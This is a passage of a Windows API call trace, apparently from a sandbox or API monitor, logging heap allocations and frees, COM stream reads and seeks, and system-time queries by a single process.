lpMem=0xc85450 | out: hHeap=0xc60000) returned 1 [0261.048] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8adc8 | out: hHeap=0xc60000) returned 1 [0261.048] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fcc4, cb=0x10, pcbRead=0x90fc9c | out: pv=0x90fcc4*=0x4d, pcbRead=0x90fc9c*=0x10) returned 0x0 [0261.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90fb98 | out: lpSystemTimeAsFileTime=0x90fb98*(dwLowDateTime=0x3d069390, dwHighDateTime=0x1d661be)) [0261.049] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.049] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f618, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f618*=0x6b, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d069390, dwHighDateTime=0x1d661be)) [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f620, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f620*=0xa6, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f408, cb=0x34, pcbRead=0x90f3dc | out: pv=0x90f408*=0xe1, pcbRead=0x90f3dc*=0x34) returned 0x0 [0261.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d06baa0, dwHighDateTime=0x1d661be)) [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f620, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f620*=0x17, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f64c, cb=0x6e, pcbRead=0x90f3dc | out: pv=0x90f64c*=0xf9, pcbRead=0x90f3dc*=0x6e) returned 0x0 [0261.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d06baa0, dwHighDateTime=0x1d661be)) [0261.049] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f610, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f610*=0xbc, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f618, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f618*=0x6b, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d06baa0, dwHighDateTime=0x1d661be)) [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f620, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f620*=0xaf, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f408, cb=0x26, pcbRead=0x90f3dc | out: pv=0x90f408*=0xe6, pcbRead=0x90f3dc*=0x26) returned 0x0 [0261.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d06baa0, dwHighDateTime=0x1d661be)) [0261.049] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f620, cb=0x4, pcbRead=0x90f3dc | out: pv=0x90f620*=0x1b, pcbRead=0x90f3dc*=0x4) returned 0x0 [0261.050] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90f64c, cb=0x76, pcbRead=0x90f3dc | out: pv=0x90f64c*=0x6b, pcbRead=0x90f3dc*=0x76) returned 0x0 [0261.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f2d8 | out: lpSystemTimeAsFileTime=0x90f2d8*(dwLowDateTime=0x3d06baa0, dwHighDateTime=0x1d661be)) [0261.050] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fcd3, cb=0x1, pcbRead=0x90f624 | out: pv=0x90fcd3*=0x1, pcbRead=0x90f624*=0x1) returned 0x0 [0261.050] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fccc, cb=0x4, pcbRead=0x90f624 | out: pv=0x90fccc*=0x86, pcbRead=0x90f624*=0x4) returned 0x0 [0261.050] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fccc, cb=0x4, pcbRead=0x90f624 | out: pv=0x90fccc*=0xe4, pcbRead=0x90f624*=0x4) returned 0x0 [0261.050] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fccc, cb=0x4, pcbRead=0x90f624 | out: pv=0x90fccc*=0x48, pcbRead=0x90f624*=0x4) returned 0x0 [0261.050] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.050] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x27c58) returned 0xca41e0 [0261.051] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x923a) returned 0xc8adc8 [0261.051] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0xc8adc8, cb=0x923a, pcbRead=0x90f624 | out: pv=0xc8adc8*=0x6d, pcbRead=0x90f624*=0x923a) returned 0x0 [0261.051] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x90f520 | out: lpSystemTimeAsFileTime=0x90f520*(dwLowDateTime=0x3d06e1b0, dwHighDateTime=0x1d661be)) [0261.053] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20000) returned 0xccbe40 [0261.053] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xcebe48 [0261.054] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xcfbe50 [0261.060] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xccbe40 | out: hHeap=0xc60000) returned 1 [0261.060] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcebe48 | out: hHeap=0xc60000) returned 1 [0261.060] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcfbe50 | out: hHeap=0xc60000) returned 1 [0261.060] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8adc8 | out: hHeap=0xc60000) returned 1 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x82e4) returned 0xc8adc8 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xc86570 [0261.060] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86570 | out: hHeap=0xc60000) returned 1 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86570 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a6f0 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86598 [0261.060] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a768 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc8a6f0 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a780 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85450 | out: hHeap=0xc60000) returned 1 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a6f0 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1e) returned 0xc865c0 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a780 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc865e8 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc865c0 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a798 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7b0 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a780 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7c8 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7e0 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a7f8 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85460 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7c8 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7c8 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a810 [0261.061] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7e0 | out: hHeap=0xc60000) returned 1 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a7e0 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a828 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a840 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a858 [0261.061] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85470 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a828 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a828 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a870 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a840 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a840 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85480 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a888 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8a0 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930d0 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85480 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a8b8 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8d0 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a888 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc722d0 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86570 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a888 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x12) returned 0xc8a628 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a8e8 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86570 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85480 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a900 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a918 [0261.062] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8e8 | out: hHeap=0xc60000) returned 1 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a8e8 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc8a930 [0261.062] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a948 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930e0 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a948 | out: hHeap=0xc60000) returned 1 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc930e0 | out: hHeap=0xc60000) returned 1 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a930 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a930 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a948 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc8a960 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a978 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a990 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930e0 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a960 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a960 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a9a8 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a978 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a978 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9c0 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xc934b8 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc722d0 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9d8 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9f0 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa08 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa20 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc930f0 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9f0 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8a9f0 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa38 [0261.063] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa08 | out: hHeap=0xc60000) returned 1 [0261.063] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa08 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa50 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa68 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc8aa80 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aa98 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8aab0 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93100 [0261.064] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa80 | out: hHeap=0xc60000) returned 1 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa80 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93558 [0261.064] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa98 | out: hHeap=0xc60000) returned 1 [0261.064] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc8aa98 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93570 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93588 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xc8a628 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935a0 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc865c0 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93110 [0261.065] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935b8 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935d0 [0261.065] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935a0 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935e8 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93600 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93618 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93630 [0261.065] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93648 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93120 [0261.066] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93618 | out: hHeap=0xc60000) returned 1 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93618 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93660 [0261.066] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93630 | out: hHeap=0xc60000) returned 1 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93630 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93678 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x100) returned 0xc93940 [0261.066] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc934b8 | out: hHeap=0xc60000) returned 1 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93690 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86610 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936a8 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86638 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93130 [0261.066] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86610 | out: hHeap=0xc60000) returned 1 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936c0 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936d8 [0261.066] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936a8 | out: hHeap=0xc60000) returned 1 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936a8 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2) returned 0xc93140 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936f0 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93708 [0261.066] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93150 [0261.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93140 | out: hHeap=0xc60000) returned 1 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93720 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93738 [0261.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936f0 | out: hHeap=0xc60000) returned 1 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936f0 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xc86610 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93750 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86660 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93140 [0261.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86610 | out: hHeap=0xc60000) returned 1 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93768 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93780 [0261.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93750 | out: hHeap=0xc60000) returned 1 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93750 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93798 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xac) returned 0xc93a48 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937f8 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93810 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93828 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93840 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93858 [0261.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93870 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93888 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938a0 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc938b8 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938d0 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc938e8 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93900 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93918 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b18 [0261.068] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93b30 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b48 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b60 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b78 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93b90 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93ba8 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bc0 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bd8 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93bf0 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c08 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93c20 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c38 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c50 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c68 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93c80 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93c98 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cb0 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cc8 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ce0 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93cf8 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93d10 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d28 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 